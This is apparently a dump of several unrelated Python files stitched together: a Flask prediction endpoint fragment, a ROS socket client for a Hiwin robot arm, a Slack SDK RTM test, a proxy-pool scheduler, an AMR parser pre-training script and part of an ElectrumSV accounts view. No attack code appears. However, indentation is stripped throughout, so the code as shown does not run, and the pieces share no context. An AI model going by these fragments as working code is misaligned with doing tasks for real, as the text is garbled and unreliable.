while "output" not in req:
time.sleep(CHECK_INTERVAL)
if req["output"] == 500:
return jsonify({"error": "Error! Please upload another file"}), 500
result_path = req["output"]
result = send_file(result_path)
shutil.rmtree(f_path)
return result
except Exception as e:
print(e)
return jsonify({"message": "Error! Please upload another file"}), 400
@app.route("/health")
def health():
return "OK", 200  # res.sendStatus() is an Express.js idiom; Flask returns a body and status code
if __name__ == "__main__":
from waitress import serve
serve(app, host="0.0.0.0", port=80)
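# --- Illustrative client sketch (not part of the original app.py) -------------
# A minimal example of how the /predict endpoint above could be exercised. The
# helper name, server URL and local file path are hypothetical; only the route,
# the "source" file field, the "file_type" form field and the jpeg content-type
# check are taken from the handler above. Requires the `requests` package.
def _example_predict_request(server="http://localhost:80", image_path="sample.jpg"):
    import requests
    with open(image_path, "rb") as f:
        resp = requests.post(
            server + "/predict",
            files={"source": ("sample.jpg", f, "image/jpeg")},
            data={"file_type": "image"},
        )
    # On success the body is the generated PNG; on error it is a JSON message.
    return resp.status_code, resp.content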
|
Hiwin_RT605_ArmCommand_Socket_20190627192924.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
## multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
Socket = 0
data = '0' # initial value of the data to transmit
Arm_feedback = 1 # assume the arm is busy
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
return  # PEP 479: raising StopIteration inside a generator is an error in Python 3.7+
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
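# Illustrative (hypothetical) usage of the switch helper above, mirroring how
# Socket_command() uses it further below: each case(...) call tests the wrapped
# value, and `break` exits once a branch has matched.
#
#     for case in switch(socket_cmd.action):
#         if case(Taskcmd.Action_Type.PtoP):
#             ...  # handle point-to-point motion
#             break
#         if case(Taskcmd.Action_Type.Line):
#             ...  # handle linear motion
#             break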
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
class client():
def __init__(self):
self.get_connect()
def get_connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(('192.168.0.1', 8080))
def send(self, msg):
self.s.send(msg.encode('utf-8')) # encode with utf-8; other encodings exist, but utf-8 is fine for str
def get_recieve(self):
data = self.s.recv(1024) # 1024 is the receive buffer size (max bytes per recv)
# Note: the raw bytes are returned as-is; callers index into them as byte values.
return data
def close(self):
self.s.close()
def point_data(x,y,z,pitch,roll,yaw): ## receive pose data sent from the strategy side
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ## receive arm-mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
#Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ## receive arm speed-mode data sent from the strategy side
socket_cmd.Speedmode = speedmode
def socket_talker(): ## create the server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##---------- socket packet transmission --------------##
##--------------- send arm commands over the socket -----------------
def Socket_command():
global Socket,arm_mode_flag,data
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#------- set arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#------- set arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#------- set arm rapid & safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 6 ## switch back to the initial mode state
print(data)
print("Socket:", Socket)
Socket.send(data) # client.send() already encodes to utf-8; encoding here again would pass bytes and fail
##-----------socket client--------
def socket_client():
global Socket
try:
Socket = client()
#Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
print(Socket.get_recieve())
Socket_feedback(Socket)
# while 1:
# feedback_str = Socket.recv(1024)
# #arm side reports the arm state
# if str(feedback_str[2]) == '48':# F: arm is ready to receive the next motion command
# state_feedback.ArmState = 0
# if str(feedback_str[2]) == '49':# T: arm is busy and cannot execute the next motion command
# state_feedback.ArmState = 1
# if str(feedback_str[2]) == '54':# 6: strategy finished
# state_feedback.ArmState = 6
# print("shutdown")
# #check the sent flag
# if str(feedback_str[4]) == '48':# returns 0, false
# state_feedback.SentFlag = 0
# if str(feedback_str[4]) == '49':# returns 1, true
# state_feedback.SentFlag = 1
# ##--------------- send arm commands over the socket: end -----------------
# if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
# break
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
Socket = s
while 1:
feedback_str = Socket.get_recieve()
#arm side reports the arm state
if str(feedback_str[2]) == '48':# F: arm is ready to receive the next motion command
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T: arm is busy and cannot execute the next motion command
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6: strategy finished
state_feedback.ArmState = 6
print("shutdown")
#check the sent flag
if str(feedback_str[4]) == '48':# returns 0, false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':# returns 1, true
state_feedback.SentFlag = 1
##--------------- send arm commands over the socket: end -----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6 ## switch to the initial mode state
## multithreading
t = threading.Thread(target=socket_client)
t.start() # start the thread
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
## multithreading end
|
test_issue_701.py
|
import asyncio
import collections
import logging
import os
import threading
import time
import unittest
import pytest
from integration_tests.env_variable_names import SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN
from integration_tests.helpers import async_test, is_not_specified
from slack import RTMClient, WebClient
class TestRTMClient(unittest.TestCase):
"""Runs integration tests with real Slack API
https://github.com/slackapi/python-slack-sdk/issues/701
"""
def setUp(self):
self.logger = logging.getLogger(__name__)
self.bot_token = os.environ[SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN]
def tearDown(self):
# Reset the decorators by @RTMClient.run_on
RTMClient._callbacks = collections.defaultdict(list)
# @pytest.mark.skipif(condition=is_not_specified(), reason="to avoid rate_limited errors")
@pytest.mark.skip()
def test_receiving_all_messages(self):
self.rtm_client = RTMClient(token=self.bot_token, loop=asyncio.new_event_loop())
self.web_client = WebClient(token=self.bot_token)
self.call_count = 0
@RTMClient.run_on(event="message")
def send_reply(**payload):
self.logger.debug(payload)
web_client, data = payload["web_client"], payload["data"]
web_client.reactions_add(channel=data["channel"], timestamp=data["ts"], name="eyes")
self.call_count += 1
def connect():
self.logger.debug("Starting RTM Client...")
self.rtm_client.start()
rtm = threading.Thread(target=connect)
rtm.setDaemon(True)
rtm.start()
time.sleep(3)
total_num = 10
sender_completion = []
def sent_bulk_message():
for i in range(total_num):
text = f"Sent by <https://slack.dev/python-slackclient/|python-slackclient>! ({i})"
self.web_client.chat_postMessage(channel="#random", text=text)
time.sleep(0.1)
sender_completion.append(True)
num_of_senders = 3
senders = []
for sender_num in range(num_of_senders):
sender = threading.Thread(target=sent_bulk_message)
sender.setDaemon(True)
sender.start()
senders.append(sender)
while len(sender_completion) < num_of_senders:
time.sleep(1)
expected_call_count = total_num * num_of_senders
wait_seconds = 0
max_wait = 20
while self.call_count < expected_call_count and wait_seconds < max_wait:
time.sleep(1)
wait_seconds += 1
self.assertEqual(total_num * num_of_senders, self.call_count, "The RTM handler failed")
@pytest.mark.skipif(condition=is_not_specified(), reason="to avoid rate_limited errors")
@async_test
async def test_receiving_all_messages_async(self):
self.rtm_client = RTMClient(token=self.bot_token, run_async=True)
self.web_client = WebClient(token=self.bot_token, run_async=False)
self.call_count = 0
@RTMClient.run_on(event="message")
async def send_reply(**payload):
self.logger.debug(payload)
web_client, data = payload["web_client"], payload["data"]
await web_client.reactions_add(channel=data["channel"], timestamp=data["ts"], name="eyes")
self.call_count += 1
# intentionally not waiting here
self.rtm_client.start()
await asyncio.sleep(3)
total_num = 10
sender_completion = []
def sent_bulk_message():
for i in range(total_num):
text = f"Sent by <https://slack.dev/python-slackclient/|python-slackclient>! ({i})"
self.web_client.chat_postMessage(channel="#random", text=text)
time.sleep(0.1)
sender_completion.append(True)
num_of_senders = 3
senders = []
for sender_num in range(num_of_senders):
sender = threading.Thread(target=sent_bulk_message)
sender.setDaemon(True)
sender.start()
senders.append(sender)
while len(sender_completion) < num_of_senders:
await asyncio.sleep(1)
expected_call_count = total_num * num_of_senders
wait_seconds = 0
max_wait = 20
while self.call_count < expected_call_count and wait_seconds < max_wait:
await asyncio.sleep(1)
wait_seconds += 1
self.assertEqual(total_num * num_of_senders, self.call_count, "The RTM handler failed")
|
scheduler.py
|
import time
from multiprocessing import Process
from proxypool.api import app
from proxypool.getter import Getter
from proxypool.tester import Tester
from proxypool.setting import *
from proxypool.db import RedisClient
class Scheduler():
def schedule_tester(self, cycle=TESTER_CYCLE):
"""
定时测试代理
"""
tester = Tester()
while True:
print('Tester is running')
tester.run()
time.sleep(cycle)
def schedule_getter(self, cycle=GETTER_CYCLE):
"""
定时获取代理
"""
getter = Getter()
while True:
print('Start fetching proxies')
getter.run()
time.sleep(cycle)
def schedule_api(self):
"""
开启API
"""
app.run(API_HOST, API_PORT)
def run(self):
print('Proxy pool is running')
if TESTER_ENABLED:
tester_process = Process(target=self.schedule_tester)
tester_process.start()
if GETTER_ENABLED:
getter_process = Process(target=self.schedule_getter)
getter_process.start()
if API_ENABLED:
api_process = Process(target=self.schedule_api)
api_process.start()
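# --- Usage sketch (added for illustration; not part of the original scheduler.py) ---
# The scheduler is assumed to be launched from a small run script roughly like
# this, with TESTER_ENABLED / GETTER_ENABLED / API_ENABLED coming from
# proxypool.setting as imported above.
if __name__ == '__main__':
    scheduler = Scheduler()
    scheduler.run()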
|
pre_train.py
|
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
import argparse, os, random
from parser.data import Vocab, DataLoader, SRLDataLoader, DUM, END, CLS, NIL, DynamicDataLoader
from parser.parser import Parser
from parser.work import show_progress
from parser.extract import LexicalMap
from parser.adam import AdamWeightDecayOptimizer
from parser.utils import move_to_device, MyThread, eval
from parser.bert_utils import BertEncoderTokenizer, BertEncoder
from parser.postprocess import PostProcessor
from parser.work import parse_data
def parse_config():
parser = argparse.ArgumentParser()
parser.add_argument('--info', type=str)
parser.add_argument('--tok_vocab', type=str)
parser.add_argument('--lem_vocab', type=str)
parser.add_argument('--pos_vocab', type=str)
parser.add_argument('--ner_vocab', type=str)
parser.add_argument('--dep_rel_vocab', type=str)
parser.add_argument('--srl_vocab', type=str)
parser.add_argument('--concept_vocab', type=str)
parser.add_argument('--predictable_concept_vocab', type=str)
parser.add_argument('--predictable_word_vocab', type=str)
parser.add_argument('--rel_vocab', type=str)
parser.add_argument('--word_char_vocab', type=str)
parser.add_argument('--concept_char_vocab', type=str)
parser.add_argument('--pretrained_file', type=str, default=None)
parser.add_argument('--with_bert', dest='with_bert', action='store_true')
parser.add_argument('--bert_path', type=str, default=None)
parser.add_argument('--encoder_graph', dest='encoder_graph', action='store_true')
parser.add_argument('--decoder_graph', dest='decoder_graph', action='store_true')
parser.add_argument('--no_post_process', dest='no_post_process', action='store_true')
parser.add_argument('--use_srl', dest='use_srl', action='store_true')
parser.add_argument('--use_gold_predicates', dest='use_gold_predicates', action='store_true')
parser.add_argument('--use_gold_arguments', dest='use_gold_arguments', action='store_true')
parser.add_argument('--soft_mtl', dest='soft_mtl', action='store_true')
parser.add_argument('--loss_weights', dest='loss_weights', action='store_true')
parser.add_argument('--sum_loss', dest='sum_loss', action='store_true')
parser.add_argument('--word_char_dim', type=int)
parser.add_argument('--word_dim', type=int)
parser.add_argument('--pos_dim', type=int)
parser.add_argument('--ner_dim', type=int)
parser.add_argument('--dep_rel_dim', type=int)
parser.add_argument('--concept_char_dim', type=int)
parser.add_argument('--concept_dim', type=int)
parser.add_argument('--rel_dim', type=int)
parser.add_argument('--cnn_filters', type=int, nargs='+')
parser.add_argument('--char2word_dim', type=int)
parser.add_argument('--char2concept_dim', type=int)
parser.add_argument('--embed_dim', type=int)
parser.add_argument('--ff_embed_dim', type=int)
parser.add_argument('--num_heads', type=int)
parser.add_argument('--snt_layers', type=int)
parser.add_argument('--graph_layers', type=int)
parser.add_argument('--inference_layers', type=int)
parser.add_argument('--pred_size', type=int)
parser.add_argument('--argu_size', type=int)
parser.add_argument('--span_size', type=int)
parser.add_argument('--ffnn_size', type=int)
parser.add_argument('--ffnn_depth', type=int)
parser.add_argument('--dropout', type=float)
parser.add_argument('--unk_rate', type=float)
parser.add_argument('--epochs', type=int)
parser.add_argument('--train_data', type=str)
parser.add_argument('--silver_train_data', type=str)
parser.add_argument('--silver_data_loss_weight', type=float)
parser.add_argument('--dev_data', type=str)
parser.add_argument('--srl_data', type=str)
parser.add_argument('--train_batch_size', type=int)
parser.add_argument('--batches_per_update', type=int)
parser.add_argument('--dev_batch_size', type=int)
parser.add_argument('--lr_scale', type=float)
parser.add_argument('--weight_decay', type=float)
parser.add_argument('--warmup_steps', type=int)
parser.add_argument('--resume_ckpt', type=str, default=None)
parser.add_argument('--ckpt', type=str)
parser.add_argument('--print_every', type=int)
parser.add_argument('--eval_every', type=int)
parser.add_argument('--world_size', type=int)
parser.add_argument('--gpus', type=int)
parser.add_argument('--MASTER_ADDR', type=str)
parser.add_argument('--MASTER_PORT', type=str)
parser.add_argument('--start_rank', type=int)
return parser.parse_args()
def average_gradients(model):
size = float(dist.get_world_size())
for param in model.parameters():
if param.grad is not None:
dist.all_reduce(param.grad.data, op=dist.ReduceOp.SUM)
param.grad.data /= size
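# Note: average_gradients() performs synchronous data-parallel averaging:
# every rank contributes its local gradient, all_reduce(SUM) makes the summed
# gradient visible on every rank, and dividing by world_size turns the sum
# into a mean, which is equivalent to the gradient of the mean loss over the
# combined batch.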
def update_lr(optimizer, lr_scale, embed_size, steps, warmup_steps):
lr = lr_scale * embed_size ** -0.5 * min(steps ** -0.5, steps * (warmup_steps ** -1.5))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
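# update_lr() follows the Transformer ("Noam") warmup schedule. Worked example
# with assumed values (lr_scale=1.0, embed_size=512, warmup_steps=4000): the
# two terms inside min() meet at steps=4000, where
#     lr = 512 ** -0.5 * 4000 ** -0.5 ≈ 0.0442 * 0.0158 ≈ 7.0e-4
# Before that point the steps * warmup_steps ** -1.5 term gives a linear
# ramp-up; afterwards the rate decays proportionally to steps ** -0.5.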
def data_proc(data, queue):
while True:
for x in data:
queue.put(x)
queue.put('EPOCHDONE')
def load_vocabs(args):
vocabs = dict()
vocabs['tok'] = Vocab(args.tok_vocab, 5, [CLS])  # drop tokens with frequency < 5 @kiro
vocabs['lem'] = Vocab(args.lem_vocab, 5, [CLS])
vocabs['pos'] = Vocab(args.pos_vocab, 5, [CLS])
vocabs['ner'] = Vocab(args.ner_vocab, 5, [CLS])
vocabs['dep_rel'] = Vocab(args.dep_rel_vocab, 5, [CLS])
if args.use_srl:
vocabs['srl'] = Vocab(args.srl_vocab, 50, [NIL])
vocabs['predictable_concept'] = Vocab(args.predictable_concept_vocab, 5, [DUM, END])
vocabs['predictable_word'] = Vocab(args.predictable_word_vocab, 5, [DUM, END]) # for AMR-to-Text @kiro
vocabs['concept'] = Vocab(args.concept_vocab, 5, [DUM, END])
vocabs['rel'] = Vocab(args.rel_vocab, 50, [NIL])
vocabs['word_char'] = Vocab(args.word_char_vocab, 100, [CLS, END])
vocabs['concept_char'] = Vocab(args.concept_char_vocab, 100, [CLS, END])
lexical_mapping = LexicalMap()
bert_encoder = None
if args.with_bert:
bert_tokenizer = BertEncoderTokenizer.from_pretrained(args.bert_path, do_lower_case=False)
vocabs['bert_tokenizer'] = bert_tokenizer
for name in vocabs:
if name == 'bert_tokenizer':
continue
print((name, vocabs[name].size, vocabs[name].coverage))
return vocabs, lexical_mapping
def main(local_rank, args):
vocabs, lexical_mapping = load_vocabs(args)
bert_encoder = None
if args.with_bert:
bert_encoder = BertEncoder.from_pretrained(args.bert_path)
for p in bert_encoder.parameters(): # fix bert @kiro
p.requires_grad = False
torch.manual_seed(19940117)
torch.cuda.manual_seed_all(19940117)
random.seed(19940117)
torch.set_num_threads(4)
torch.cuda.set_device(local_rank)
device = torch.device('cuda', local_rank) # totally read @kiro
print("#"*25)
print("Concerned important config details")
print("use graph encoder?", args.encoder_graph)
print("use graph decoder?", args.decoder_graph)
print("use srl for MTL?", args.use_srl)
print("use_gold_predicates?", args.use_gold_predicates)
print("use_gold_arguments?", args.use_gold_arguments)
print("soft mtl?", args.soft_mtl)
print("sum loss?", args.sum_loss)
print("loss_weights?", args.loss_weights)
print("silver_data_loss_weight", args.silver_data_loss_weight)
print("#"*25)
model = Parser(vocabs,
args.word_char_dim, args.word_dim, args.pos_dim, args.ner_dim, args.dep_rel_dim,
args.concept_char_dim, args.concept_dim,
args.cnn_filters, args.char2word_dim, args.char2concept_dim,
args.embed_dim, args.ff_embed_dim, args.num_heads, args.dropout,
args.snt_layers, args.graph_layers, args.inference_layers, args.rel_dim,
args.pretrained_file, bert_encoder,
device, args.sum_loss,
False)
print(model)
if args.world_size > 1:
torch.manual_seed(19940117 + dist.get_rank())
torch.cuda.manual_seed_all(19940117 + dist.get_rank())
random.seed(19940117 + dist.get_rank())
model = model.cuda(local_rank)
dev_data = DataLoader(vocabs, lexical_mapping, args.dev_data, args.dev_batch_size, for_train=False) # load data @kiro
pp = PostProcessor(vocabs['rel'])
weight_decay_params = []
no_weight_decay_params = []
for name, param in model.named_parameters():
if name.endswith('bias') or 'layer_norm' in name:
no_weight_decay_params.append(param)
else:
weight_decay_params.append(param)
grouped_params = [{'params': weight_decay_params, 'weight_decay': args.weight_decay},
{'params': no_weight_decay_params, 'weight_decay': 0.}]
optimizer = AdamWeightDecayOptimizer(grouped_params, 1., betas=(0.9, 0.999), eps=1e-6) # "correct" L2 @kiro
used_batches = 0
batches_acm = 0
if args.resume_ckpt: # false, not supported @kiro
ckpt = torch.load(args.resume_ckpt)
model.load_state_dict(ckpt['model'])
optimizer.load_state_dict(ckpt['optimizer'])
batches_acm = ckpt['batches_acm']
del ckpt
silver_file = open(args.silver_train_data, 'r')
print("read silver file from {}".format(args.silver_train_data))
silver_train_data = DynamicDataLoader(
vocabs, lexical_mapping, silver_file, args.train_batch_size, for_train=True
)
silver_train_data.set_unk_rate(args.unk_rate)
silver_queue = mp.Queue(10)
silver_train_data_generator = mp.Process(target=data_proc, args=(silver_train_data, silver_queue))
silver_data_loss_weight = 1.0 if args.silver_data_loss_weight is None else args.silver_data_loss_weight
silver_train_data_generator.start()
eval_tool = eval('%s/%s' % (args.ckpt, "checkpoint.txt"), args.dev_data, )
model.train()
epoch, loss_avg, srl_loss_avg, concept_loss_avg, arc_loss_avg, rel_loss_avg, concept_repr_loss_avg =\
0, 0, 0, 0, 0, 0, 0
silver_loss_avg, silver_concept_loss_avg, silver_arc_loss_avg, silver_rel_loss_avg, silver_concept_repr_loss_avg = \
0, 0, 0, 0, 0
max_training_epochs = int(args.epochs)  # @kiro
print("Start training...")
is_start = True
while epoch < max_training_epochs:  # the original loop had no stop condition; now bounded by max_training_epochs @kiro
while True:
batch = silver_queue.get()
if isinstance(batch, str):
silver_train_data_generator.terminate()
silver_train_data_generator.join()
# read the next sample batches
silver_train_data = DynamicDataLoader(
vocabs, lexical_mapping, silver_file, args.train_batch_size, for_train=True
)
silver_train_data.set_unk_rate(args.unk_rate)
silver_queue = mp.Queue(10)
silver_train_data_generator = mp.Process(target=data_proc, args=(silver_train_data, silver_queue))
silver_train_data_generator.start()
if args.world_size == 1 or (dist.get_rank() == 0):
if len(silver_train_data.data) < 20000:
epoch += 1
model.eval()
output_dev_file = '%s/epoch%d_batch%d_dev_out' % (args.ckpt, epoch, batches_acm)
parse_data(model, pp, dev_data, args.dev_data, output_dev_file, args)
saved_model = '%s/epoch%d_batch%d' % (args.ckpt, epoch, batches_acm)
torch.save({'args': args,
'model': model.state_dict(),
'batches_acm': batches_acm,
'optimizer': optimizer.state_dict()},
saved_model)
eval_task = MyThread(eval_tool.eval, (output_dev_file, saved_model, not args.no_post_process))
eval_task.start()
model.train()
print('epoch', epoch, 'done', 'batches', batches_acm)
print('batches', batches_acm)
else:
batch = move_to_device(batch, model.device) # data moved to device
silver_concept_loss, silver_arc_loss, silver_rel_loss, silver_graph_arc_loss = model.forward(
batch, encoder_graph=args.encoder_graph, decoder_graph=args.decoder_graph)
# model forward, please note that graph_arc_loss is not used
loss = (silver_concept_loss + silver_arc_loss + silver_rel_loss) / args.batches_per_update # compute
loss_value = loss.item()
silver_concept_loss_value = silver_concept_loss.item()
silver_arc_loss_value = silver_arc_loss.item()
silver_rel_loss_value = silver_rel_loss.item()
# concept_repr_loss_value = concept_repr_loss.item()
silver_loss_avg = silver_loss_avg * args.batches_per_update * 0.8 + 0.2 * loss_value
silver_concept_loss_avg = silver_concept_loss_avg * 0.8 + 0.2 * silver_concept_loss_value
silver_arc_loss_avg = silver_arc_loss_avg * 0.8 + 0.2 * silver_arc_loss_value
silver_rel_loss_avg = silver_rel_loss_avg * 0.8 + 0.2 * silver_rel_loss_value
# concept_repr_loss_avg = concept_repr_loss_avg * 0.8 + 0.2 * concept_repr_loss_value
loss = silver_data_loss_weight * loss
loss.backward() # loss backward
used_batches += 1
if not (used_batches % args.batches_per_update == -1 % args.batches_per_update):
continue
batches_acm += 1
if args.world_size > 1:
average_gradients(model)
torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)
lr = update_lr(optimizer, args.lr_scale, args.embed_dim, batches_acm, args.warmup_steps)
optimizer.step() # update the model parameters according to the losses @kiro
optimizer.zero_grad()
if args.world_size == 1 or (dist.get_rank() == 0):
if batches_acm % args.print_every == -1 % args.print_every:
print('Train Epoch %d, Batch %d, LR %.6f, conc_loss %.3f, arc_loss %.3f, rel_loss %.3f, concept_repr_loss %.3f, srl_loss %.3f' % (
epoch, batches_acm, lr, concept_loss_avg, arc_loss_avg, rel_loss_avg, concept_repr_loss_avg, srl_loss_avg))
print('==============>, silver_conc_loss %.3f, silver_arc_loss %.3f, silver_rel_loss %.3f' % (
silver_concept_loss_avg, silver_arc_loss_avg, silver_rel_loss_avg)
)
model.train()
# if (batches_acm > 100 or args.resume_ckpt is not None) and batches_acm % args.eval_every == -1 % args.eval_every:
break
silver_train_data_generator.terminate()
silver_train_data_generator.join()
print("Training process is done.") # @kiro
def init_processes(local_rank, args, backend='nccl'):
os.environ['MASTER_ADDR'] = args.MASTER_ADDR
os.environ['MASTER_PORT'] = args.MASTER_PORT
dist.init_process_group(backend, rank=args.start_rank + local_rank, world_size=args.world_size)
main(local_rank, args)
if __name__ == "__main__":
args = parse_config()
if not os.path.exists(args.ckpt): # create the ckpt dir @kiro
os.mkdir(args.ckpt)
assert len(args.cnn_filters) % 2 == 0
args.cnn_filters = list(zip(args.cnn_filters[:-1:2], args.cnn_filters[1::2]))
gpu_number = torch.cuda.device_count()
print("number of available GPUs", gpu_number)
args.world_size = args.gpus = gpu_number
if args.world_size == 1:
main(0, args)
exit(0)
mp.spawn(init_processes, args=(args,), nprocs=args.gpus)
|
accounts_view.py
|
import csv
from functools import partial
import json
import os
import threading
import time
from typing import List, Optional, Sequence
import weakref
from PyQt5.QtCore import QEvent, QItemSelectionModel, QModelIndex, pyqtSignal, QSize, Qt
from PyQt5.QtGui import QPainter, QPaintEvent
from PyQt5.QtWidgets import (QLabel, QListWidget, QListWidgetItem, QMenu, QSplitter, QTabWidget,
QTextEdit, QVBoxLayout)
from electrumsv.bitcoin import address_from_string, script_template_to_string
from electrumsv.constants import AccountType, DerivationType, KeystoreType
from electrumsv.i18n import _
from electrumsv.logs import logs
from electrumsv.wallet import AbstractAccount, MultisigAccount, Wallet
from .account_dialog import AccountDialog
from .main_window import ElectrumWindow
from .util import (Buttons, CancelButton, filename_field, line_dialog, MessageBox, OkButton,
protected, read_QIcon, WindowModalDialog)
class AccountsView(QSplitter):
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, main_window: ElectrumWindow, wallet: Wallet) -> None:
super().__init__(main_window)
self._logger = logs.get_logger("accounts-view")
self._main_window = weakref.proxy(main_window)
self._wallet = wallet
self._main_window.account_created_signal.connect(self._on_account_created)
self._main_window.account_change_signal.connect(self._on_account_changed)
# We subclass QListWidget so accounts cannot be deselected.
class CustomListWidget(QListWidget):
def selectionCommand(self, index: QModelIndex, event: Optional[QEvent]) \
-> QItemSelectionModel.SelectionFlags:
flags = super().selectionCommand(index, event)
if flags == QItemSelectionModel.Deselect:
return QItemSelectionModel.NoUpdate
return flags
def paintEvent(self, event: QPaintEvent) -> None:
super().paintEvent(event)
if self.count() > 0:
return
painter = QPainter(self.viewport())
painter.drawText(self.rect(), Qt.AlignCenter, _("Add your first account.."))
self._account_ids: List[int] = []
self._tab_widget = QTabWidget()
self._selection_list = CustomListWidget()
self._selection_list.setMinimumWidth(150)
self._selection_list.setIconSize(QSize(32, 32))
self._selection_list.setContextMenuPolicy(Qt.CustomContextMenu)
self._selection_list.customContextMenuRequested.connect(self._show_account_menu)
self._selection_list.currentItemChanged.connect(self._on_current_item_changed)
self._current_account_id: Optional[int] = None
self.addWidget(self._selection_list)
self.addWidget(self._tab_widget)
self.setChildrenCollapsible(False)
def on_wallet_loaded(self) -> None:
self._initialize_account_list()
def init_geometry(self, sizes: Optional[Sequence[int]]=None) -> None:
self._logger.debug("init_geometry.1 %r", sizes)
if sizes is None:
sizes = [ 200, self._main_window.size().width() - 200 ]
self._logger.debug("init_geometry.2 %r", sizes)
self.setSizes(sizes)
def _on_account_created(self, new_account_id: int, new_account: AbstractAccount) -> None:
# It should be made the active wallet account and followed up with the change event.
self._add_account_to_list(new_account)
def _on_account_changed(self, new_account_id: int, new_account: AbstractAccount) -> None:
# The list is being told what to focus on.
if self._update_active_account(new_account_id):
row = self._account_ids.index(new_account_id)
self._selection_list.setCurrentRow(row)
